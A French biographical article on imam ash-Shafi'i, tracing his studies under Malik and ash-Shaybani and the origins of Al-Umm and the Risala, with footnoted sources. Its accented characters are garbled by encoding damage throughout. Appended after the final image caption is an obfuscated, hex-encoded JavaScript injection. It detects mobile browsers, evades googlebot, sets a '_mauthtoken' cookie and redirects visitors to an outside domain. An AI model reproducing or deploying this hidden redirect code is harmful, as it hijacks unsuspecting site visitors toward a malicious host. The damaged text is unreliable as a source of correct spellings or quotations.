Ce petit article a pour ambition de retracer en quelques lignes la vie de la��imam ash-ShA?fia��A� et contextualiser la naissance de ses deux A�uvres majeuresA�: Al-Umm et Ar-RisA?la. La��imam ash-ShA?fia��A� aprA?s avoir A�tudiA� le malA�kisme directement A� sa source et plus tard le hanA�fisme rassembla ses savoirs qui donneront naissance, malgrA� lui, A� sa propre A�cole juridique. Il est sans conteste la��un des plus grands savants musulmans que la terre na��ait jamais portA� et a marquA� profondA�ment la discipline des fondements du droit musulman.

De la naissance A� la science

Le grand thA�ologien AbA� Abdullah Mohammad ibn IdrA�s, connu sous le nom de la��imam ash-ShA?fia��A�, est nA� A� Gaza (en Palestine) en 150H (767), annA�e de laA� mort du fondateur de la��A�cole hanA�fiteA�: la��imam AbA� HanA�fa. Il est mort en 204H (820) en Egypte. Son A�A�patronymeA�A� a pour origine son ancA?tre ShafA� ibn as-SA?a��ib qui fA�t selon les biographes un compagnon du ProphA?te.[1] Mohammad ibn IdrA�s devint orphelin de pA?re durant son enfance (A� la��A?ge de deux ou dix ans selon les sources) et partit avec sa mA?re A� la Mecque. Plus tard, il passa un long sA�jour dans la tribu des Hudhaylites qui A�tait rA�putA�e pour la puretA� de son arabe.[2]

Il A�tudia A� la Mecque et A� MA�dine avec des grands savants de la��A�poque dont ad-DarA?wardA�, az-Zanji et la��A�minent imam fondateur de la��A�cole malA�kiteA�: MA?lik ibn Anas. Quand la��imam MA?lik la��entendit lire le Muwatta pour la premiA?re fois, il fut subjuguA� par son A�loquence et sa maA�trise de la langue. Mohammad ibn IdrA�s devint son lecteur privilA�giA�.[3]

A� la mort de la��imam MA?lik, Mohammad ibn IdrA�s avait obtenu les ijA?zA?t nA�cessaires ainsi que la��autorisation de donner des fatA?wA?. Il devint da��abord qA?dA� (juge) A� NajrA?n au Yemen.[4] Puis plus tard, sans prendre totalement ses distances avec MA�dine et la Mecque, il alla successivement au Yemen, puis enseigner en Iraq et pour finir en Egypte. Ces deux derniA?res pA�riodes marqueront son A�volution mA�thodologique et la crA�ation de son A�cole. Sa premiA?re version de la RisA?la fut rA�digA�e en Iraq et fut perdue. Ca��A�tait la��A�A�A�ancienneA�A� (qadA�m) jurisprudence de Shafia��A�.[5]

La��A�preuve du qA?dA� de Najran

La��imam ash-ShA?fia��A� devint cA�lA?bre pour son scrupule et sa justice A� NajrA?n, cela ne plut pas A� la��A�lite yA�mA�nite qui avait la��habitude de courtiser les juges et les gouverneurs. Dans le contexte de l’A�poque, afin de le discrA�diter, il fut accusA� da��A?tre chiite par ses dA�tracteurs.[6] La��imam ash-ShA?fia��A� ne cachait pas son amour pour a�?AlA� ibn AbA� TA?lib et la famille du ProphA?te mais demeurait sunnite. La��imam Mohammad ibn IdrA�s ash-ShA?fia��A�, alors A?gA� de trente-quatre ans fut arrA?tA� pour A?tre emmenA� A� Bagdad. Finalement, il fut lavA� de tout soupA�on grA?ce au tA�moignage de Mohammad ash-ShaybA?nA� qui la��avait connu aux cercles de la��imam MA?lik et qui depuis A�tait devenu qA?dA� A� Bagdad.[7]

Le A�A�vieilA�A� A�tudiant de Bagdad

La��imam ash-ShA?fia��A� arrA?ta sa carriA?re de qA?dA� et recommenA�a la��A�tude de la science en sa��abreuvant du savoir de son ami et maA�tre Mohammad ibn Hasan ash-ShaybA?nA� qui avait A�tA� la��un des deux grands disciples de la��imam AbA� HanA�fa.[8] Ca��est ainsi que la��imam ash-ShA?fia��A� commenA�a A� construire sa mA�thodologie et son A�A�A�coleA�A� A� partir de la maA�trise des enseignements de la��imam MA?lik da��une part et de la��imam AbA� HanA�fa, au travers de Mohammad ash-ShaybA?nA�, da��autre part. Vers quarante-cinq ans, il commenA�a A� dicter ses A�uvres A�A�bagdadiennesA�A� dont Al-Umm (La mA?re) qui compilait ses avis juridiques.[9] Il eut des grands disciples A� cette A�poque dont Ahmad ibn Hanbal et la��imam IshA?q ibn RA?hawA�h. Ce dernier disait qua��avant de suivre ash-ShA?fia��A�, personne na��avait entendu parler de la��abrogeant et de la��abrogA� (an-nA?sikh wa al-mansA�kh).

La pA�riode Egyptienne

Ca��est en Egypte que son influence devint prA�A�minente et qua��il A�crivit la deuxiA?me version de sa RisA?la.A� Le titre complet est RisA?la fA� usA�l al-fiqh (A�pA�tre sur les fondements du droit). La��imam ash-ShA?fia��A� va A?tre le premier A� A�laborer les principes du droit sous la forme da��un code. Avant lui, les savants discutaient des questions des usA�l al-fiqh mais ne disposaient pas da��un code da��ensemble (qA?nA�n kullA�).[10] Personne avant lui A�A�na��avait conceptualisA� la science de ces fondements du droit.A�A�[11] La��imam ash-ShA?fia��A� va dA�terminer dans son livre Al-Umm cinq sources de la jurisprudence et les classer hiA�rarchiquement.[12]

  1. Le Coran et la Sunna authentique. Les ahA?dith authentifiA�s se retrouvent au premier niveau avec le Coran.
  2. Le consensus (ijmA?a��) dans le cas oA? le Coran et la Sunna ne sont pas disponibles. Le consensus des faqA�h (juristes) est considA�rA� comme un argument (houjja) pour leur gA�nA�ration et les futures.
  3. Les opinions (paroles) de certains compagnons (qawl as-sahA?bA�) sur des questions oA? il na��existe pas da��avis divergents.
  4. Les opinions (paroles) des compagnons qui ont A�tA� opposA�es A� da��autres mais qui sont les plus proches du Coran et de la Sunna ou celles qui sont confirmA�es par la��analogie.
  5. Le raisonnement analogique (qiyA?s) na��est pratiquA� qua��en dernier recours et ne peut jamais contredire les sources prA�cA�dentes.

La RisA?la fA� usA�l al-fiqh est un rA�sumA� portant sur les fondements de la jurisprudence islamique. La��imam ash-ShA?fia��A� dA�veloppe diffA�rents sujets dans ce livre ; il y traite des rA?gles et des mA�thodes de dA�duction et da��interprA�tationA�; il y prA�sente des preuves de ses avis juridiques et de la mA�thodologie appliquA�e pour tirer ces jugements; il y fournit des informations concernant les recherches qua��il a menA�es en matiA?re de ahA?dith et de athA?r (traditions des compagnons). La RisA?la fut collectA�e par AbA� Mohammad RabA�’ ibn SulaymA?n al-MurA?dA�, son prestigieux disciple et fidA?le transmetteur, qui y recueillit ce qui na��avait pas dA�jA� A�tA� rapportA� dans Al-Umm.[13]

Un visionnaire

La��imam A�ponyme ash-ShA?fia��A� a rA�volutionnA� les fondements du droit etA�leur codification. Ca��A�tait un homme trA?s pieux et scrupuleux dans sa pratique religieuse. Il a su lier le rigorisme de la��imam Malik et son attachement au hadA�th A� la rA�flexion par la��analogie de la��imam AbA� HanA�fa.

Dans sa grande sagesse, la��imam de la Sunna, AbA� Abdullah Mohammad ibn IdrA�s ash-ShA?fia��A� disaitA�: A�Je na��ai jamais dA�battu sans espA�rer que la vA�ritA� apparaisse, indiffA�remment par ma langue ou celle da��autrui.A�[14]

La��A�cole shA?fA�ite a vu naA�tre un nombre invraisemblable de maA�tres de grande renommA�e dont la��imam an-NA?wawA�, ibn HA?jar al-AsqalA?nA�, al-BaqA�lani, AbA� HamA�d al-GhA?zA?li (parfois appelA� le deuxiA?me ash-ShA?fia��A�), la��imam as-SuyA�tti, Fakhr ad-DA�ne ar-RA?zA� les cA�lA?bres exA�gA?tes ibn-KathA�r ainsi qua��at-TA?barA�, la��imam al-Haramayn et a dominA� de nombreuses villes da��Orient se rA�pandant en Egypte, en Irak, au Khorassan, au Sijistan, au ChA?m, au YA�men et au-delA� de la��Euphrate, en Perse, au HijA?z, en Inde et en IndonA�sie.[15]

 

[1] Souami Lakhdar, La RisA?la. Les fondements du droit musulman, Paris, Actes Sud, 1997, p. 10-11.

[2] Souami, op.cit., p.12.

[3] Brahami Mostafa, Les six grands imamsA�: A�volution historique de la jurisprudence islamique, Paris, Tawhid, 2010, p.294.

[4] Brahami, op.cit., p.298.

[5] Souami, op.cit., p.17.

[6] Boudjenoun Messaoud, Les quatre imA?ms fondateurs des A�coles sunnites, Paris, Universel, 2009, pp. 167-168.

[7] Brahami, op.cit., p.300.

[8] Souami, op.cit., p.17.

[9] Brahami, op.cit., p.303.

[10] Souami, op.cit., p.29.

[11] Brahami, op.cit., p.315.

[12] AboA� Zahra Mohammad, La��imA?m ach-ChA?fia��A�. Sa vie et son A�poque, ses opinions et son fiqh, Paris, A�ditions Al Qalam, 2012, pp. 218-219.

[13] Souami, op.cit., p.24.

[14] Brahami, op.cit., p.327.

[15] Boudjenoun, op.cit., p.215-219.

Image : MausolA�e de l’imamA�ash-ShA?fia��A�. Le Caire, Egypte.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}